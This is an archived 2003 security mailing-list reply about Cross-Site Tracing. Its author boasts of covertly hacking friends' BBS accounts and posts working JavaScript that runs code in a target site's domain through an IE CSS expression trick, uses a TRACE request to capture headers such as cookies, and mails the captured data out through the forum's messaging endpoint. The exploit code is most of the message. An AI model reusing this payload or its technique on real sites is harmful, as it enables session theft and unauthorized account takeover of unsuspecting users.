Re: TRACE used to increase the dangerous of XSS.

From: Phrack (securityat_private)
Date: Thu Jan 23 2003 - 17:08:28 PST

Next message: kers0r: "Vulnerability in edittag.pl"

Previous message: Andrew Clover: "Re: New Web Vulnerability - Cross-Site Tracing"
In reply to: Thor Larholm: "RE: TRACE used to increase the dangerous of XSS."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

It's really a terrible security hole.  Using this method, I have hacked some BBS account of my friends. If you do it properly, it wouldn't be noticed by victim. The following is my code:

<script type="text/javascript">

function xssDomainTraceRequest(){

  var exampleCode = "var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\")\;xmlHttp.open(\"TRACE\",\"http://bbs.for.bar\",false)\;xmlHttp.send()\;xmlDoc=xmlHttp.responseText\;xmlHttp.open(\"POST\",\"http://bbs.for.bar/member.php\",false)\;xmlHttp.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\")\;xmlHttp.send(\"s=&action=emailmessage&userid=11111&subject=test&message=\" + xmlDoc)\;";

  var target = "http://bbs.for.bar";

  cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
  var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
  showModalDialog(target, null, readyCode);
}
</script>

<script>
xssDomainTraceRequest();
</script>

Chen haiyan, CISSP
System Security Engineer
HENAN CFONLINE COMMERCE CO., LTD.

Next message: kers0r: "Vulnerability in edittag.pl"
Previous message: Andrew Clover: "Re: New Web Vulnerability - Cross-Site Tracing"
In reply to: Thor Larholm: "RE: TRACE used to increase the dangerous of XSS."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jan 24 2003 - 10:14:05 PST